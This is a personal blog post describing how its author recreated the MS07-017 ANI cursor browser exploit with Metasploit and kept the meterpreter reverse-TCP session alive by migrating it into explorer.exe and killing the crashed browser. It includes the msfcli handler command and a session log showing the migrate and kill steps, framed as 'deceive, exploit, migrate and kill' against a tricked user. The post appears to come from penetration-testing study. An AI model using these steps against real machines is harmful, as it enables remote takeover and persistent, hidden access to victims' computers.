Deceive, exploit, migrate and kill.

I’ve been playing with the Metasploit framework and the *evil* meterpreter payload today (I would tell you why but I’m sure it would break a non-disclosure agreement or something :))

In particular I was studying client-side attacks and recreating the infamous MS07-17 (a classic!). While I was enjoying myself among hex code and debuggers, the way nerds do, I realized that the browser always hanged, thus forcing the user to kill the process and cutting down our meterpreter session. Not good. “Got root?” yes, but just for twenty seconds.

Looking for ways to improve the stability of the exploit, a colleague proposed a workaround, migrate the [meterpreter] server to another process. I totally forgot about the migrate command. This is how it can be done and the issues left unsolved.

I have just implemented the MS07-17 ANI vulnerability with the meterpreter reverse tcp payload, like this

I have “tricked” the user to visit my website and he inadvertently downloaded the evil cursor code that exploits the vuln in the GDI code. Oopppss! As a result, he has connected back to the machine, received the dll (it’s a staged payload) and  injected it into the running process, iexplore.exe in this case.

We can indeed confirm that looking at the dll’s with Process Explorer, as in the follow capture:

After the migration of the meterpreter server to another process, less likely to be killed (for example explorer.exe), IE will crash but the process won’t die completely. Trying to attach a debugger to it will show us that the process window name is “MCI command handling window”. Although Process Explorer still shows the evil dll located at some point in the memory of this process, this address is not reachable using the debugger.

However, just to do things well it would be a good idea to kill the process (or what remains of it).

The whole process would be something like the following paste:

root@bt:/pentest/exploits/framework3# ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= EXITFUNC=seh E
[*] Please wait while we load the module tree...
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened ( ->

meterpreter > ps

Process list

PID   Name                 Arch  User                 Path
---   ----                 ----  ----                 ----
0     [System Process]
4     System               x86
580   smss.exe             x86   NT AUTHORITYSYSTEM  SystemRootSystem32smss.exe
652   csrss.exe            x86   NT AUTHORITYSYSTEM  ??C:WINDOWSsystem32csrss.exe
712   winlogon.exe         x86   NT AUTHORITYSYSTEM  ??C:WINDOWSsystem32winlogon.exe
756   services.exe         x86   NT AUTHORITYSYSTEM  C:WINDOWSsystem32services.exe

1860  ctfmon.exe           x86   CLIENT034offsec     C:WINDOWSsystem32ctfmon.exe

 2004  svchost.exe          x86                        C:WINDOWSSystem32svchost.exe

 1880  explorer.exe         x86   CLIENT034offsec     C:WINDOWSexplorer.exe

 1920  iexplore.exe         x86   CLIENT034offsec     C:Program FilesInternet Exploreriexplore.exe

meterpreter > migrate 1880

[*] Migrating to 1880...

[*] Migration completed successfully.

meterpreter > kill 1920

Killing: 1920

meterpreter > getpid

Current pid: 1880

meterpreter >

As easy as “deceive, exploit, migrate and kill” :)


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s